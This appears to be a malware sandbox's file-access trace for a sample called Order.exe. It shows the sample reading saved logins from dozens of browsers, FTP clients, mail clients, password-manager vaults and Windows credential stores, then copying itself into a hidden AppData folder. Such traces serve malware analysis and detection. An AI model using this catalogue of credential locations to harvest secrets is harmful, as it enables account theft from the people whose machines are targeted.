C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSVCR120_CLR0400.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.localgac
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ole32.dll
\Device\KsecDD
C:\Windows\assembly\NativeImages_v4.0.30319_32\28C66gEdfyuxjXKM\*
C:\Users\Seven01\AppData\Local\Temp\Order.INI
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\Microsoft.Net\assembly\GAC_32\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.dll
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.tmp
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.0.cs
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.dll
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.out
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.err
C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.pdb
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux
C:\Users\Seven01\AppData\Local\Temp\Order.exe.Local\
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\shell32.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\assembly\GAC_64
C:\Windows\assembly\GAC_64\mscorlib.resources
C:\Windows\assembly\GAC_32
C:\Windows\assembly\GAC_32\mscorlib.resources
C:\Windows\assembly\GAC_MSIL
C:\Windows\assembly\GAC_MSIL\mscorlib.resources
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\*
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC
C:\Windows\assembly\GAC\mscorlib.resources
C:\Windows\Microsoft.Net\assembly\GAC_64
C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib.resources
C:\Windows\Microsoft.Net\assembly\GAC_32
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib.resources
C:\Windows\Microsoft.Net\assembly\GAC_MSIL
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\mscorlib.resources
C:\Windows\Microsoft.Net\assembly\GAC
C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.Linq.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\ntdll.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest
C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll
C:\Windows\System32\mscoree.dll.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\System.Management.dll
C:\Windows
C:\Windows\Microsoft.NET
C:\Windows\Microsoft.NET\Framework
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll
C:\Users\Seven01\AppData\Local\Temp\System.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll
C:\Users\Seven01\AppData\Local\Temp\System.Drawing.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll
C:\Users\Seven01\AppData\Local\Temp\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll
C:\Users\Seven01\AppData\Local\Temp\CSCEDDBAB3124834608A4D661E9537B99ED.TMP
C:\Users\Seven01\AppData\Local\Temp\RES2FF4.tmp
C:\Windows\System32\tzres.dll
C:\Program Files\NETGATE\Black Hawk
C:\Program Files (x86)\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}
C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalComodo\Dragon\Login Data
C:\Users\Seven01\AppData\LocalComodo\Dragon\Default\Login Data
C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalMapleStudio\ChromePlus\Login Data
C:\Users\Seven01\AppData\LocalMapleStudio\ChromePlus\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome\Login Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome\Default\Login Data
C:\Users\Seven01\AppData\Local\Nichrome\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Nichrome\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalNichrome\Login Data
C:\Users\Seven01\AppData\LocalNichrome\Default\Login Data
C:\Users\Seven01\AppData\Local\RockMelt\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\RockMelt\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalRockMelt\Login Data
C:\Users\Seven01\AppData\LocalRockMelt\Default\Login Data
C:\Users\Seven01\AppData\Local\Spark\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Spark\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalSpark\Login Data
C:\Users\Seven01\AppData\LocalSpark\Default\Login Data
C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalChromium\Login Data
C:\Users\Seven01\AppData\LocalChromium\Default\Login Data
C:\Users\Seven01\AppData\Local\Titan Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Titan Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalTitan Browser\Login Data
C:\Users\Seven01\AppData\LocalTitan Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\Torch\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Torch\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalTorch\Login Data
C:\Users\Seven01\AppData\LocalTorch\Default\Login Data
C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalYandex\YandexBrowser\Login Data
C:\Users\Seven01\AppData\LocalYandex\YandexBrowser\Default\Login Data
C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalEpic Privacy Browser\Login Data
C:\Users\Seven01\AppData\LocalEpic Privacy Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalCocCoc\Browser\Login Data
C:\Users\Seven01\AppData\LocalCocCoc\Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\Vivaldi\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Vivaldi\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalVivaldi\Login Data
C:\Users\Seven01\AppData\LocalVivaldi\Default\Login Data
C:\Users\Seven01\AppData\Local\Comodo\Chromodo\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Comodo\Chromodo\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalComodo\Chromodo\Login Data
C:\Users\Seven01\AppData\LocalComodo\Chromodo\Default\Login Data
C:\Users\Seven01\AppData\Local\Superbird\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Superbird\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalSuperbird\Login Data
C:\Users\Seven01\AppData\LocalSuperbird\Default\Login Data
C:\Users\Seven01\AppData\Local\Coowon\Coowon\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Coowon\Coowon\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalCoowon\Coowon\Login Data
C:\Users\Seven01\AppData\LocalCoowon\Coowon\Default\Login Data
C:\Users\Seven01\AppData\Local\Mustang Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Mustang Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalMustang Browser\Login Data
C:\Users\Seven01\AppData\LocalMustang Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\360Browser\Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\360Browser\Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\Local360Browser\Browser\Login Data
C:\Users\Seven01\AppData\Local360Browser\Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalCatalinaGroup\Citrio\Login Data
C:\Users\Seven01\AppData\LocalCatalinaGroup\Citrio\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome SxS\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome SxS\Login Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome SxS\Default\Login Data
C:\Users\Seven01\AppData\Local\Orbitum\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Orbitum\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalOrbitum\Login Data
C:\Users\Seven01\AppData\LocalOrbitum\Default\Login Data
C:\Users\Seven01\AppData\Local\Iridium\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Iridium\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalIridium\Login Data
C:\Users\Seven01\AppData\LocalIridium\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data
C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\Login Data
C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Web Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\Login Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Web Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Web Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Default\Login Data
C:\Users\Seven01\AppData\Local\QupZilla\profiles\default\browsedata.db
C:\Users\Seven01\AppData\Roaming\Opera
C:\Users\Seven01\AppData\Roaming\.purple\accounts.xml
C:\Users\Seven01\Documents\SuperPutty
C:\Program Files (x86)\FTPShell\ftpshell.fsi
C:\Users\Seven01\AppData\Roaming\Notepad++\plugins\config\NppFTP\NppFTP.xml
C:\Program Files (x86)\oZone3D\MyFTP\myftp.ini
C:\Users\Seven01\AppData\Roaming\FTPBox\profiles.conf
C:\Program Files (x86)\Sherrod Computers\sherrod FTP\favorites
C:\Program Files (x86)\FTP Now\sites.xml
C:\Program Files (x86)\NexusFile\userdata\ftpsite.ini
C:\Users\Seven01\AppData\Roaming\NexusFile\ftpsite.ini
C:\Users\Seven01\Documents\NetSarang\Xftp\Sessions
C:\Users\Seven01\AppData\Roaming\NetSarang\Xftp\Sessions
C:\Program Files (x86)\EasyFTP\data
C:\Users\Seven01\AppData\Roaming\SftpNetDrive
C:\Program Files (x86)\AbleFTP7\encPwd.jsd
C:\Program Files (x86)\AbleFTP7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP8\encPwd.jsd
C:\Program Files (x86)\AbleFTP8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP9\encPwd.jsd
C:\Program Files (x86)\AbleFTP9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP10\encPwd.jsd
C:\Program Files (x86)\AbleFTP10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP11\encPwd.jsd
C:\Program Files (x86)\AbleFTP11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP12\encPwd.jsd
C:\Program Files (x86)\AbleFTP12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP13\encPwd.jsd
C:\Program Files (x86)\AbleFTP13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP14\encPwd.jsd
C:\Program Files (x86)\AbleFTP14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP14\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp7\encPwd.jsd
C:\Program Files (x86)\JaSFtp7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp8\encPwd.jsd
C:\Program Files (x86)\JaSFtp8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp9\encPwd.jsd
C:\Program Files (x86)\JaSFtp9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp10\encPwd.jsd
C:\Program Files (x86)\JaSFtp10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp11\encPwd.jsd
C:\Program Files (x86)\JaSFtp11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp12\encPwd.jsd
C:\Program Files (x86)\JaSFtp12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp13\encPwd.jsd
C:\Program Files (x86)\JaSFtp13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp14\encPwd.jsd
C:\Program Files (x86)\JaSFtp14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp14\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize7\encPwd.jsd
C:\Program Files (x86)\Automize7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize8\encPwd.jsd
C:\Program Files (x86)\Automize8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize9\encPwd.jsd
C:\Program Files (x86)\Automize9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize10\encPwd.jsd
C:\Program Files (x86)\Automize10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize11\encPwd.jsd
C:\Program Files (x86)\Automize11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize12\encPwd.jsd
C:\Program Files (x86)\Automize12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize13\encPwd.jsd
C:\Program Files (x86)\Automize13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize14\encPwd.jsd
C:\Program Files (x86)\Automize14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize14\data\settings\ftpProfiles-j.jsd
C:\Users\Seven01\AppData\Roaming\Cyberduck
C:\Users\Seven01\AppData\Roaming\iterate_GmbH
C:\Users\Seven01\.config\fullsync\profiles.xml
C:\Users\Seven01\AppData\Roaming\FTPInfo\ServerList.xml
C:\Users\Seven01\AppData\Roaming\FTPInfo\ServerList.cfg
C:\Program Files (x86)\FileZilla\Filezilla.xml
C:\Users\Seven01\AppData\Roaming\FileZilla\filezilla.xml
C:\Users\Seven01\AppData\Roaming\FileZilla\recentservers.xml
C:\Users\Seven01\AppData\Roaming\FileZilla\sitemanager.xml
C:\Program Files (x86)\Staff-FTP\sites.ini
C:\Users\Seven01\AppData\Roaming\BlazeFtp\site.dat
C:\Program Files (x86)\Fastream NETFile\My FTP Links
C:\Program Files (x86)\GoFTP\settings\Connections.txt
C:\Users\Seven01\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
C:\Program Files (x86)\DeluxeFTP\sites.xml
C:\Windows\wcx_ftp.ini
C:\Users\Seven01\AppData\Roaming\wcx_ftp.ini
C:\Users\Seven01\wcx_ftp.ini
C:\Users\Seven01\AppData\Roaming\GHISLER\wcx_ftp.ini
C:\Program Files (x86)\FTPGetter\Profile\servers.xml
C:\Users\Seven01\AppData\Roaming\FTPGetter\servers.xml
C:\Program Files (x86)\WS_FTP\WS_FTP.INI
C:\Windows\WS_FTP.INI
C:\Users\Seven01\AppData\Roaming\Ipswitch
C:\Users\Seven01\site.xml
C:\Users\Seven01\AppData\Local\PokerStars*
C:\Users\Seven01\AppData\Local\ExpanDrive
C:\Users\Seven01\AppData\Roaming\Steed\bookmarks.txt
C:\Users\Seven01\AppData\Roaming\FlashFXP
C:\ProgramData\FlashFXP
C:\Users\Seven01\AppData\Local\INSoftware\NovaFTP\NovaFTP.db
C:\Users\Seven01\AppData\Roaming\NetDrive\NDSites.ini
C:\Users\Seven01\AppData\Roaming\NetDrive2\drives.dat
C:\ProgramData\NetDrive2\drives.dat
C:\Users\Seven01\AppData\Roaming\SmartFTP
C:\Users\Seven01\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
C:\Users\Seven01\Documents\*.tlp
C:\Users\Seven01\Documents\*.bscp
C:\Users\Seven01\Documents\*.vnc
C:\Users\Seven01\Desktop\*.vnc
C:\Users\Seven01\Documents\mSecure
C:\ProgramData\Syncovery
C:\Program Files (x86)\FreshWebmaster\FreshFTP\FtpSites.SMF
C:\Users\Seven01\AppData\Roaming\BitKinex\bitkinex.ds
C:\Users\Seven01\AppData\Roaming\UltraFXP\sites.xml
C:\Users\Seven01\AppData\Roaming\FTP Now\sites.xml
C:\Program Files (x86)\Odin Secure FTP Expert\QFDefault.QFQ
C:\Program Files (x86)\Odin Secure FTP Expert\SiteInfo.QFP
C:\Program Files (x86)\Foxmail\mail
C:\Foxmail*
C:\Users\Seven01\AppData\Roaming\Pocomail\accounts.ini
C:\Users\Seven01\Documents\Pocomail\accounts.ini
C:\Users\Seven01\AppData\Roaming\GmailNotifierPro\ConfigData.xml
C:\Users\Seven01\AppData\Roaming\DeskSoft\CheckMail
C:\Program Files (x86)\WinFtp Client\Favorites.dat
C:\Windows\32BitFtp.TMP
C:\Windows\32BitFtp.ini
C:\FTP Navigator\Ftplist.txt
C:\Softwarenetz\Mailing\Daten\mailing.vdt
C:\Users\Seven01\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
C:\Users\Seven01\Documents\*Mailbox.ini
C:\Users\Seven01\Documents\yMail2\POP3.xml
C:\Users\Seven01\Documents\yMail2\SMTP.xml
C:\Users\Seven01\Documents\yMail2\Accounts.xml
C:\Users\Seven01\Documents\yMail\ymail.ini
C:\Users\Seven01\AppData\Roaming\TrulyMail\Data\Settings\user.config
C:\Users\Seven01\Documents\*.spn
C:\Users\Seven01\Desktop\*.spn
C:\Users\Seven01\AppData\Roaming\To-Do DeskList\tasks.db
C:\Users\Seven01\AppData\Roaming\stickies\images
C:\Users\Seven01\AppData\Roaming\stickies\rtf
C:\Users\Seven01\AppData\Roaming\NoteFly\notes
C:\Users\Seven01\AppData\Roaming\Conceptworld\Notezilla\Notes8.db
C:\Users\Seven01\AppData\Roaming\Microsoft\Sticky Notes\StickyNotes.snt
C:\Users\Seven01\Documents
C:\Users\Seven01\Documents\*.kdbx
C:\Users\Seven01\Desktop
C:\Users\Seven01\Desktop\*.kdbx
C:\Users\Seven01\Documents\*.kdb
C:\Users\Seven01\Desktop\*.kdb
C:\Users\Seven01\Documents\Enpass
C:\Users\Seven01\Documents\My RoboForm Data
C:\Users\Seven01\Documents\1Password
C:\Users\Seven01\AppData\Local\Temp\Mikrotik\Winbox
C:\Windows\Microsoft.NET\Framework\v2.0.50727\NETAPI32.DLL
C:\Windows\System32\netapi32.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\netutils.dll
C:\Windows\System32\netutils.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\srvcli.dll
C:\Windows\System32\srvcli.dll
C:\Users\Seven01\AppData\Roaming\E62877
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck
C:\Users\Seven01\AppData\Roaming\Microsoft\Credentials
C:\Users\Seven01\AppData\Roaming\Microsoft\Credentials\*
C:\Users\Seven01\AppData\Local\Microsoft\Credentials
C:\Users\Seven01\AppData\Local\Microsoft\Credentials\*
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe
C:\Windows\Temp
C:\Windows\sysnative\Tasks\Microsoft\Windows\WDI\ResolutionHost
C:\Windows\sysnative\LogFiles\Scm\9435f817-fed2-454e-88cd-7f78fda62c48
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ndpsetup.bat
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat
